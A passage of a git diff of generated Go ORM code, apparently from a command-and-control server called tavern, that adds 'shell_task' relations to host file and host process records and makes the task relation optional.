+ withTask *TaskQuery + withShellTask *ShellTaskQuery + withFKs bool + modifiers []func(*sql.Selector) + loadTotal []func(context.Context, []*HostFile) error // intermediate query (i.e. traversal path). sql *sql.Selector path func(context.Context) (*sql.Selector, error) @@ -109,6 +111,28 @@ func (hfq *HostFileQuery) QueryTask() *TaskQuery { return query } +// QueryShellTask chains the current query on the "shell_task" edge. +func (hfq *HostFileQuery) QueryShellTask() *ShellTaskQuery { + query := (&ShellTaskClient{config: hfq.config}).Query() + query.path = func(ctx context.Context) (fromU *sql.Selector, err error) { + if err := hfq.prepareQuery(ctx); err != nil { + return nil, err + } + selector := hfq.sqlQuery(ctx) + if err := selector.Err(); err != nil { + return nil, err + } + step := sqlgraph.NewStep( + sqlgraph.From(hostfile.Table, hostfile.FieldID, selector), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, hostfile.ShellTaskTable, hostfile.ShellTaskColumn), + ) + fromU = sqlgraph.SetNeighbors(hfq.driver.Dialect(), step) + return fromU, nil + } + return query +} + // First returns the first HostFile entity from the query. // Returns a *NotFoundError when no HostFile was found. func (hfq *HostFileQuery) First(ctx context.Context) (*HostFile, error) { @@ -296,13 +320,14 @@ func (hfq *HostFileQuery) Clone() *HostFileQuery { return nil } return &HostFileQuery{ - config: hfq.config, - ctx: hfq.ctx.Clone(), - order: append([]hostfile.OrderOption{}, hfq.order...), - inters: append([]Interceptor{}, hfq.inters...), - predicates: append([]predicate.HostFile{}, hfq.predicates...), - withHost: hfq.withHost.Clone(), - withTask: hfq.withTask.Clone(), + config: hfq.config, + ctx: hfq.ctx.Clone(), + order: append([]hostfile.OrderOption{}, hfq.order...), + inters: append([]Interceptor{}, hfq.inters...), + predicates: append([]predicate.HostFile{}, hfq.predicates...), + withHost: hfq.withHost.Clone(), + withTask: hfq.withTask.Clone(), + withShellTask: hfq.withShellTask.Clone(), // clone intermediate query. sql: hfq.sql.Clone(), path: hfq.path, @@ -331,6 +356,17 @@ func (hfq *HostFileQuery) WithTask(opts ...func(*TaskQuery)) *HostFileQuery { return hfq } +// WithShellTask tells the query-builder to eager-load the nodes that are connected to +// the "shell_task" edge. The optional arguments are used to configure the query builder of the edge. +func (hfq *HostFileQuery) WithShellTask(opts ...func(*ShellTaskQuery)) *HostFileQuery { + query := (&ShellTaskClient{config: hfq.config}).Query() + for _, opt := range opts { + opt(query) + } + hfq.withShellTask = query + return hfq +} + // GroupBy is used to group vertices by one or more fields/columns. // It is often used with aggregate functions, like: count, max, mean, min, sum. // @@ -410,12 +446,13 @@ func (hfq *HostFileQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([]*Ho nodes = []*HostFile{} withFKs = hfq.withFKs _spec = hfq.querySpec() - loadedTypes = [2]bool{ + loadedTypes = [3]bool{ hfq.withHost != nil, hfq.withTask != nil, + hfq.withShellTask != nil, } ) - if hfq.withHost != nil || hfq.withTask != nil { + if hfq.withHost != nil || hfq.withTask != nil || hfq.withShellTask != nil { withFKs = true } if withFKs { @@ -454,6 +491,12 @@ func (hfq *HostFileQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([]*Ho return nil, err } } + if query := hfq.withShellTask; query != nil { + if err := hfq.loadShellTask(ctx, query, nodes, nil, + func(n *HostFile, e *ShellTask) { n.Edges.ShellTask = e }); err != nil { + return nil, err + } + } for i := range hfq.loadTotal { if err := hfq.loadTotal[i](ctx, nodes); err != nil { return nil, err @@ -526,6 +569,38 @@ func (hfq *HostFileQuery) loadTask(ctx context.Context, query *TaskQuery, nodes } return nil } +func (hfq *HostFileQuery) loadShellTask(ctx context.Context, query *ShellTaskQuery, nodes []*HostFile, init func(*HostFile), assign func(*HostFile, *ShellTask)) error { + ids := make([]int, 0, len(nodes)) + nodeids := make(map[int][]*HostFile) + for i := range nodes { + if nodes[i].shell_task_reported_files == nil { + continue + } + fk := *nodes[i].shell_task_reported_files + if _, ok := nodeids[fk]; !ok { + ids = append(ids, fk) + } + nodeids[fk] = append(nodeids[fk], nodes[i]) + } + if len(ids) == 0 { + return nil + } + query.Where(shelltask.IDIn(ids...)) + neighbors, err := query.All(ctx) + if err != nil { + return err + } + for _, n := range neighbors { + nodes, ok := nodeids[n.ID] + if !ok { + return fmt.Errorf(`unexpected foreign-key "shell_task_reported_files" returned %v`, n.ID) + } + for i := range nodes { + assign(nodes[i], n) + } + } + return nil +} func (hfq *HostFileQuery) sqlCount(ctx context.Context) (int, error) { _spec := hfq.querySpec() diff --git a/tavern/internal/ent/hostfile_update.go b/tavern/internal/ent/hostfile_update.go index aab7b3e11..b5228386e 100644 --- a/tavern/internal/ent/hostfile_update.go +++ b/tavern/internal/ent/hostfile_update.go @@ -14,6 +14,7 @@ import ( "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostfile" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -180,11 +181,38 @@ func (hfu *HostFileUpdate) SetTaskID(id int) *HostFileUpdate { return hfu } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (hfu *HostFileUpdate) SetNillableTaskID(id *int) *HostFileUpdate { + if id != nil { + hfu = hfu.SetTaskID(*id) + } + return hfu +} + // SetTask sets the "task" edge to the Task entity. func (hfu *HostFileUpdate) SetTask(t *Task) *HostFileUpdate { return hfu.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hfu *HostFileUpdate) SetShellTaskID(id int) *HostFileUpdate { + hfu.mutation.SetShellTaskID(id) + return hfu +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hfu *HostFileUpdate) SetNillableShellTaskID(id *int) *HostFileUpdate { + if id != nil { + hfu = hfu.SetShellTaskID(*id) + } + return hfu +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hfu *HostFileUpdate) SetShellTask(s *ShellTask) *HostFileUpdate { + return hfu.SetShellTaskID(s.ID) +} + // Mutation returns the HostFileMutation object of the builder. func (hfu *HostFileUpdate) Mutation() *HostFileMutation { return hfu.mutation @@ -202,6 +230,12 @@ func (hfu *HostFileUpdate) ClearTask() *HostFileUpdate { return hfu } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (hfu *HostFileUpdate) ClearShellTask() *HostFileUpdate { + hfu.mutation.ClearShellTask() + return hfu +} + // Save executes the query and returns the number of nodes affected by the update operation. func (hfu *HostFileUpdate) Save(ctx context.Context) (int, error) { if err := hfu.defaults(); err != nil { @@ -264,9 +298,6 @@ func (hfu *HostFileUpdate) check() error { if hfu.mutation.HostCleared() && len(hfu.mutation.HostIDs()) > 0 { return errors.New(`ent: clearing a required unique edge "HostFile.host"`) } - if hfu.mutation.TaskCleared() && len(hfu.mutation.TaskIDs()) > 0 { - return errors.New(`ent: clearing a required unique edge "HostFile.task"`) - } return nil } @@ -382,6 +413,35 @@ func (hfu *HostFileUpdate) sqlSave(ctx context.Context) (n int, err error) { } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if hfu.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostfile.ShellTaskTable, + Columns: []string{hostfile.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := hfu.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostfile.ShellTaskTable, + Columns: []string{hostfile.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } if n, err = sqlgraph.UpdateNodes(ctx, hfu.driver, _spec); err != nil { if _, ok := err.(*sqlgraph.NotFoundError); ok { err = &NotFoundError{hostfile.Label} @@ -552,11 +612,38 @@ func (hfuo *HostFileUpdateOne) SetTaskID(id int) *HostFileUpdateOne { return hfuo } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (hfuo *HostFileUpdateOne) SetNillableTaskID(id *int) *HostFileUpdateOne { + if id != nil { + hfuo = hfuo.SetTaskID(*id) + } + return hfuo +} + // SetTask sets the "task" edge to the Task entity. func (hfuo *HostFileUpdateOne) SetTask(t *Task) *HostFileUpdateOne { return hfuo.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hfuo *HostFileUpdateOne) SetShellTaskID(id int) *HostFileUpdateOne { + hfuo.mutation.SetShellTaskID(id) + return hfuo +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hfuo *HostFileUpdateOne) SetNillableShellTaskID(id *int) *HostFileUpdateOne { + if id != nil { + hfuo = hfuo.SetShellTaskID(*id) + } + return hfuo +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hfuo *HostFileUpdateOne) SetShellTask(s *ShellTask) *HostFileUpdateOne { + return hfuo.SetShellTaskID(s.ID) +} + // Mutation returns the HostFileMutation object of the builder. func (hfuo *HostFileUpdateOne) Mutation() *HostFileMutation { return hfuo.mutation @@ -574,6 +661,12 @@ func (hfuo *HostFileUpdateOne) ClearTask() *HostFileUpdateOne { return hfuo } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (hfuo *HostFileUpdateOne) ClearShellTask() *HostFileUpdateOne { + hfuo.mutation.ClearShellTask() + return hfuo +} + // Where appends a list predicates to the HostFileUpdate builder. func (hfuo *HostFileUpdateOne) Where(ps ...predicate.HostFile) *HostFileUpdateOne { hfuo.mutation.Where(ps...) @@ -649,9 +742,6 @@ func (hfuo *HostFileUpdateOne) check() error { if hfuo.mutation.HostCleared() && len(hfuo.mutation.HostIDs()) > 0 { return errors.New(`ent: clearing a required unique edge "HostFile.host"`) } - if hfuo.mutation.TaskCleared() && len(hfuo.mutation.TaskIDs()) > 0 { - return errors.New(`ent: clearing a required unique edge "HostFile.task"`) - } return nil } @@ -784,6 +874,35 @@ func (hfuo *HostFileUpdateOne) sqlSave(ctx context.Context) (_node *HostFile, er } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if hfuo.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostfile.ShellTaskTable, + Columns: []string{hostfile.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := hfuo.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostfile.ShellTaskTable, + Columns: []string{hostfile.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } _node = &HostFile{config: hfuo.config} _spec.Assign = _node.assignValues _spec.ScanValues = _node.scanValues diff --git a/tavern/internal/ent/hostprocess.go b/tavern/internal/ent/hostprocess.go index 16c4ccb18..571bcfc12 100644 --- a/tavern/internal/ent/hostprocess.go +++ b/tavern/internal/ent/hostprocess.go @@ -12,6 +12,7 @@ import ( "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -44,11 +45,12 @@ type HostProcess struct { Status epb.Process_Status `json:"status,omitempty"` // Edges holds the relations/edges for other nodes in the graph. // The values are being populated by the HostProcessQuery when eager-loading is set. - Edges HostProcessEdges `json:"edges"` - host_processes *int - host_process_host *int - task_reported_processes *int - selectValues sql.SelectValues + Edges HostProcessEdges `json:"edges"` + host_processes *int + host_process_host *int + shell_task_reported_processes *int + task_reported_processes *int + selectValues sql.SelectValues } // HostProcessEdges holds the relations/edges for other nodes in the graph. @@ -57,11 +59,13 @@ type HostProcessEdges struct { Host *Host `json:"host,omitempty"` // Task that reported this process. Task *Task `json:"task,omitempty"` + // Shell Task that reported this process. + ShellTask *ShellTask `json:"shell_task,omitempty"` // loadedTypes holds the information for reporting if a // type was loaded (or requested) in eager-loading or not. - loadedTypes [2]bool + loadedTypes [3]bool // totalCount holds the count of the edges above. - totalCount [2]map[string]int + totalCount [3]map[string]int } // HostOrErr returns the Host value or an error if the edge @@ -86,6 +90,17 @@ func (e HostProcessEdges) TaskOrErr() (*Task, error) { return nil, &NotLoadedError{edge: "task"} } +// ShellTaskOrErr returns the ShellTask value or an error if the edge +// was not loaded in eager-loading, or loaded but was not found. +func (e HostProcessEdges) ShellTaskOrErr() (*ShellTask, error) { + if e.ShellTask != nil { + return e.ShellTask, nil + } else if e.loadedTypes[2] { + return nil, &NotFoundError{label: shelltask.Label} + } + return nil, &NotLoadedError{edge: "shell_task"} +} + // scanValues returns the types for scanning values from sql.Rows. func (*HostProcess) scanValues(columns []string) ([]any, error) { values := make([]any, len(columns)) @@ -103,7 +118,9 @@ func (*HostProcess) scanValues(columns []string) ([]any, error) { values[i] = new(sql.NullInt64) case hostprocess.ForeignKeys[1]: // host_process_host values[i] = new(sql.NullInt64) - case hostprocess.ForeignKeys[2]: // task_reported_processes + case hostprocess.ForeignKeys[2]: // shell_task_reported_processes + values[i] = new(sql.NullInt64) + case hostprocess.ForeignKeys[3]: // task_reported_processes values[i] = new(sql.NullInt64) default: values[i] = new(sql.UnknownType) @@ -207,6 +224,13 @@ func (hp *HostProcess) assignValues(columns []string, values []any) error { *hp.host_process_host = int(value.Int64) } case hostprocess.ForeignKeys[2]: + if value, ok := values[i].(*sql.NullInt64); !ok { + return fmt.Errorf("unexpected type %T for edge-field shell_task_reported_processes", value) + } else if value.Valid { + hp.shell_task_reported_processes = new(int) + *hp.shell_task_reported_processes = int(value.Int64) + } + case hostprocess.ForeignKeys[3]: if value, ok := values[i].(*sql.NullInt64); !ok { return fmt.Errorf("unexpected type %T for edge-field task_reported_processes", value) } else if value.Valid { @@ -236,6 +260,11 @@ func (hp *HostProcess) QueryTask() *TaskQuery { return NewHostProcessClient(hp.config).QueryTask(hp) } +// QueryShellTask queries the "shell_task" edge of the HostProcess entity. +func (hp *HostProcess) QueryShellTask() *ShellTaskQuery { + return NewHostProcessClient(hp.config).QueryShellTask(hp) +} + // Update returns a builder for updating this HostProcess. // Note that you need to call HostProcess.Unwrap() before calling this method if this HostProcess // was returned from a transaction, and the transaction was committed or rolled back. diff --git a/tavern/internal/ent/hostprocess/hostprocess.go b/tavern/internal/ent/hostprocess/hostprocess.go index c4e26d1fe..8972e2d9c 100644 --- a/tavern/internal/ent/hostprocess/hostprocess.go +++ b/tavern/internal/ent/hostprocess/hostprocess.go @@ -43,6 +43,8 @@ const ( EdgeHost = "host" // EdgeTask holds the string denoting the task edge name in mutations. EdgeTask = "task" + // EdgeShellTask holds the string denoting the shell_task edge name in mutations. + EdgeShellTask = "shell_task" // Table holds the table name of the hostprocess in the database. Table = "host_processes" // HostTable is the table that holds the host relation/edge. @@ -59,6 +61,13 @@ const ( TaskInverseTable = "tasks" // TaskColumn is the table column denoting the task relation/edge. TaskColumn = "task_reported_processes" + // ShellTaskTable is the table that holds the shell_task relation/edge. + ShellTaskTable = "host_processes" + // ShellTaskInverseTable is the table name for the ShellTask entity. + // It exists in this package in order to avoid circular dependency with the "shelltask" package. + ShellTaskInverseTable = "shell_tasks" + // ShellTaskColumn is the table column denoting the shell_task relation/edge. + ShellTaskColumn = "shell_task_reported_processes" ) // Columns holds all SQL columns for hostprocess fields. @@ -82,6 +91,7 @@ var Columns = []string{ var ForeignKeys = []string{ "host_processes", "host_process_host", + "shell_task_reported_processes", "task_reported_processes", } @@ -197,6 +207,13 @@ func ByTaskField(field string, opts ...sql.OrderTermOption) OrderOption { sqlgraph.OrderByNeighborTerms(s, newTaskStep(), sql.OrderByField(field, opts...)) } } + +// ByShellTaskField orders the results by shell_task field. +func ByShellTaskField(field string, opts ...sql.OrderTermOption) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborTerms(s, newShellTaskStep(), sql.OrderByField(field, opts...)) + } +} func newHostStep() *sqlgraph.Step { return sqlgraph.NewStep( sqlgraph.From(Table, FieldID), @@ -211,6 +228,13 @@ func newTaskStep() *sqlgraph.Step { sqlgraph.Edge(sqlgraph.M2O, true, TaskTable, TaskColumn), ) } +func newShellTaskStep() *sqlgraph.Step { + return sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.To(ShellTaskInverseTable, FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, ShellTaskTable, ShellTaskColumn), + ) +} var ( // epb.Process_Status must implement graphql.Marshaler. diff --git a/tavern/internal/ent/hostprocess/where.go b/tavern/internal/ent/hostprocess/where.go index 000a3cd4b..3eb1efa51 100644 --- a/tavern/internal/ent/hostprocess/where.go +++ b/tavern/internal/ent/hostprocess/where.go @@ -762,6 +762,29 @@ func HasTaskWith(preds ...predicate.Task) predicate.HostProcess { }) } +// HasShellTask applies the HasEdge predicate on the "shell_task" edge. +func HasShellTask() predicate.HostProcess { + return predicate.HostProcess(func(s *sql.Selector) { + step := sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, ShellTaskTable, ShellTaskColumn), + ) + sqlgraph.HasNeighbors(s, step) + }) +} + +// HasShellTaskWith applies the HasEdge predicate on the "shell_task" edge with a given conditions (other predicates). +func HasShellTaskWith(preds ...predicate.ShellTask) predicate.HostProcess { + return predicate.HostProcess(func(s *sql.Selector) { + step := newShellTaskStep() + sqlgraph.HasNeighborsWith(s, step, func(s *sql.Selector) { + for _, p := range preds { + p(s) + } + }) + }) +} + // And groups predicates with the AND operator between them. func And(predicates ...predicate.HostProcess) predicate.HostProcess { return predicate.HostProcess(sql.AndPredicates(predicates...)) diff --git a/tavern/internal/ent/hostprocess_create.go b/tavern/internal/ent/hostprocess_create.go index 0caec9a61..d195c2b45 100644 --- a/tavern/internal/ent/hostprocess_create.go +++ b/tavern/internal/ent/hostprocess_create.go @@ -14,6 +14,7 @@ import ( "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -156,11 +157,38 @@ func (hpc *HostProcessCreate) SetTaskID(id int) *HostProcessCreate { return hpc } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (hpc *HostProcessCreate) SetNillableTaskID(id *int) *HostProcessCreate { + if id != nil { + hpc = hpc.SetTaskID(*id) + } + return hpc +} + // SetTask sets the "task" edge to the Task entity. func (hpc *HostProcessCreate) SetTask(t *Task) *HostProcessCreate { return hpc.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hpc *HostProcessCreate) SetShellTaskID(id int) *HostProcessCreate { + hpc.mutation.SetShellTaskID(id) + return hpc +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hpc *HostProcessCreate) SetNillableShellTaskID(id *int) *HostProcessCreate { + if id != nil { + hpc = hpc.SetShellTaskID(*id) + } + return hpc +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hpc *HostProcessCreate) SetShellTask(s *ShellTask) *HostProcessCreate { + return hpc.SetShellTaskID(s.ID) +} + // Mutation returns the HostProcessMutation object of the builder. func (hpc *HostProcessCreate) Mutation() *HostProcessMutation { return hpc.mutation @@ -242,9 +270,6 @@ func (hpc *HostProcessCreate) check() error { if len(hpc.mutation.HostIDs()) == 0 { return &ValidationError{Name: "host", err: errors.New(`ent: missing required edge "HostProcess.host"`)} } - if len(hpc.mutation.TaskIDs()) == 0 { - return &ValidationError{Name: "task", err: errors.New(`ent: missing required edge "HostProcess.task"`)} - } return nil } @@ -350,6 +375,23 @@ func (hpc *HostProcessCreate) createSpec() (*HostProcess, *sqlgraph.CreateSpec) _node.task_reported_processes = &nodes[0] _spec.Edges = append(_spec.Edges, edge) } + if nodes := hpc.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostprocess.ShellTaskTable, + Columns: []string{hostprocess.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _node.shell_task_reported_processes = &nodes[0] + _spec.Edges = append(_spec.Edges, edge) + } return _node, _spec } diff --git a/tavern/internal/ent/hostprocess_query.go b/tavern/internal/ent/hostprocess_query.go index 140c2cf29..cd2ebeba7 100644 --- a/tavern/internal/ent/hostprocess_query.go +++ b/tavern/internal/ent/hostprocess_query.go @@ -14,21 +14,23 @@ import ( "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) // HostProcessQuery is the builder for querying HostProcess entities. type HostProcessQuery struct { config - ctx *QueryContext - order []hostprocess.OrderOption - inters []Interceptor - predicates []predicate.HostProcess - withHost *HostQuery - withTask *TaskQuery - withFKs bool - modifiers []func(*sql.Selector) - loadTotal []func(context.Context, []*HostProcess) error + ctx *QueryContext + order []hostprocess.OrderOption + inters []Interceptor + predicates []predicate.HostProcess + withHost *HostQuery + withTask *TaskQuery + withShellTask *ShellTaskQuery + withFKs bool + modifiers []func(*sql.Selector) + loadTotal []func(context.Context, []*HostProcess) error // intermediate query (i.e. traversal path). sql *sql.Selector path func(context.Context) (*sql.Selector, error) @@ -109,6 +111,28 @@ func (hpq *HostProcessQuery) QueryTask() *TaskQuery { return query } +// QueryShellTask chains the current query on the "shell_task" edge. +func (hpq *HostProcessQuery) QueryShellTask() *ShellTaskQuery { + query := (&ShellTaskClient{config: hpq.config}).Query() + query.path = func(ctx context.Context) (fromU *sql.Selector, err error) { + if err := hpq.prepareQuery(ctx); err != nil { + return nil, err + } + selector := hpq.sqlQuery(ctx) + if err := selector.Err(); err != nil { + return nil, err + } + step := sqlgraph.NewStep( + sqlgraph.From(hostprocess.Table, hostprocess.FieldID, selector), + sqlgraph.To(shelltask.Table, shelltask.FieldID), + sqlgraph.Edge(sqlgraph.M2O, true, hostprocess.ShellTaskTable, hostprocess.ShellTaskColumn), + ) + fromU = sqlgraph.SetNeighbors(hpq.driver.Dialect(), step) + return fromU, nil + } + return query +} + // First returns the first HostProcess entity from the query. // Returns a *NotFoundError when no HostProcess was found. func (hpq *HostProcessQuery) First(ctx context.Context) (*HostProcess, error) { @@ -296,13 +320,14 @@ func (hpq *HostProcessQuery) Clone() *HostProcessQuery { return nil } return &HostProcessQuery{ - config: hpq.config, - ctx: hpq.ctx.Clone(), - order: append([]hostprocess.OrderOption{}, hpq.order...), - inters: append([]Interceptor{}, hpq.inters...), - predicates: append([]predicate.HostProcess{}, hpq.predicates...), - withHost: hpq.withHost.Clone(), - withTask: hpq.withTask.Clone(), + config: hpq.config, + ctx: hpq.ctx.Clone(), + order: append([]hostprocess.OrderOption{}, hpq.order...), + inters: append([]Interceptor{}, hpq.inters...), + predicates: append([]predicate.HostProcess{}, hpq.predicates...), + withHost: hpq.withHost.Clone(), + withTask: hpq.withTask.Clone(), + withShellTask: hpq.withShellTask.Clone(), // clone intermediate query. sql: hpq.sql.Clone(), path: hpq.path, @@ -331,6 +356,17 @@ func (hpq *HostProcessQuery) WithTask(opts ...func(*TaskQuery)) *HostProcessQuer return hpq } +// WithShellTask tells the query-builder to eager-load the nodes that are connected to +// the "shell_task" edge. The optional arguments are used to configure the query builder of the edge. +func (hpq *HostProcessQuery) WithShellTask(opts ...func(*ShellTaskQuery)) *HostProcessQuery { + query := (&ShellTaskClient{config: hpq.config}).Query() + for _, opt := range opts { + opt(query) + } + hpq.withShellTask = query + return hpq +} + // GroupBy is used to group vertices by one or more fields/columns. // It is often used with aggregate functions, like: count, max, mean, min, sum. // @@ -410,12 +446,13 @@ func (hpq *HostProcessQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([] nodes = []*HostProcess{} withFKs = hpq.withFKs _spec = hpq.querySpec() - loadedTypes = [2]bool{ + loadedTypes = [3]bool{ hpq.withHost != nil, hpq.withTask != nil, + hpq.withShellTask != nil, } ) - if hpq.withHost != nil || hpq.withTask != nil { + if hpq.withHost != nil || hpq.withTask != nil || hpq.withShellTask != nil { withFKs = true } if withFKs { @@ -454,6 +491,12 @@ func (hpq *HostProcessQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([] return nil, err } } + if query := hpq.withShellTask; query != nil { + if err := hpq.loadShellTask(ctx, query, nodes, nil, + func(n *HostProcess, e *ShellTask) { n.Edges.ShellTask = e }); err != nil { + return nil, err + } + } for i := range hpq.loadTotal { if err := hpq.loadTotal[i](ctx, nodes); err != nil { return nil, err @@ -526,6 +569,38 @@ func (hpq *HostProcessQuery) loadTask(ctx context.Context, query *TaskQuery, nod } return nil } +func (hpq *HostProcessQuery) loadShellTask(ctx context.Context, query *ShellTaskQuery, nodes []*HostProcess, init func(*HostProcess), assign func(*HostProcess, *ShellTask)) error { + ids := make([]int, 0, len(nodes)) + nodeids := make(map[int][]*HostProcess) + for i := range nodes { + if nodes[i].shell_task_reported_processes == nil { + continue + } + fk := *nodes[i].shell_task_reported_processes + if _, ok := nodeids[fk]; !ok { + ids = append(ids, fk) + } + nodeids[fk] = append(nodeids[fk], nodes[i]) + } + if len(ids) == 0 { + return nil + } + query.Where(shelltask.IDIn(ids...)) + neighbors, err := query.All(ctx) + if err != nil { + return err + } + for _, n := range neighbors { + nodes, ok := nodeids[n.ID] + if !ok { + return fmt.Errorf(`unexpected foreign-key "shell_task_reported_processes" returned %v`, n.ID) + } + for i := range nodes { + assign(nodes[i], n) + } + } + return nil +} func (hpq *HostProcessQuery) sqlCount(ctx context.Context) (int, error) { _spec := hpq.querySpec() diff --git a/tavern/internal/ent/hostprocess_update.go b/tavern/internal/ent/hostprocess_update.go index 074346f4c..a7e3450b5 100644 --- a/tavern/internal/ent/hostprocess_update.go +++ b/tavern/internal/ent/hostprocess_update.go @@ -15,6 +15,7 @@ import ( "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/predicate" + "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/task" ) @@ -218,11 +219,38 @@ func (hpu *HostProcessUpdate) SetTaskID(id int) *HostProcessUpdate { return hpu } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (hpu *HostProcessUpdate) SetNillableTaskID(id *int) *HostProcessUpdate { + if id != nil { + hpu = hpu.SetTaskID(*id) + } + return hpu +} + // SetTask sets the "task" edge to the Task entity. func (hpu *HostProcessUpdate) SetTask(t *Task) *HostProcessUpdate { return hpu.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hpu *HostProcessUpdate) SetShellTaskID(id int) *HostProcessUpdate { + hpu.mutation.SetShellTaskID(id) + return hpu +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hpu *HostProcessUpdate) SetNillableShellTaskID(id *int) *HostProcessUpdate { + if id != nil { + hpu = hpu.SetShellTaskID(*id) + } + return hpu +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hpu *HostProcessUpdate) SetShellTask(s *ShellTask) *HostProcessUpdate { + return hpu.SetShellTaskID(s.ID) +} + // Mutation returns the HostProcessMutation object of the builder. func (hpu *HostProcessUpdate) Mutation() *HostProcessMutation { return hpu.mutation @@ -240,6 +268,12 @@ func (hpu *HostProcessUpdate) ClearTask() *HostProcessUpdate { return hpu } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (hpu *HostProcessUpdate) ClearShellTask() *HostProcessUpdate { + hpu.mutation.ClearShellTask() + return hpu +} + // Save executes the query and returns the number of nodes affected by the update operation. func (hpu *HostProcessUpdate) Save(ctx context.Context) (int, error) { hpu.defaults() @@ -291,9 +325,6 @@ func (hpu *HostProcessUpdate) check() error { if hpu.mutation.HostCleared() && len(hpu.mutation.HostIDs()) > 0 { return errors.New(`ent: clearing a required unique edge "HostProcess.host"`) } - if hpu.mutation.TaskCleared() && len(hpu.mutation.TaskIDs()) > 0 { - return errors.New(`ent: clearing a required unique edge "HostProcess.task"`) - } return nil } @@ -415,6 +446,35 @@ func (hpu *HostProcessUpdate) sqlSave(ctx context.Context) (n int, err error) { } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if hpu.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostprocess.ShellTaskTable, + Columns: []string{hostprocess.ShellTaskColumn}, + Bidi: false, + Target: 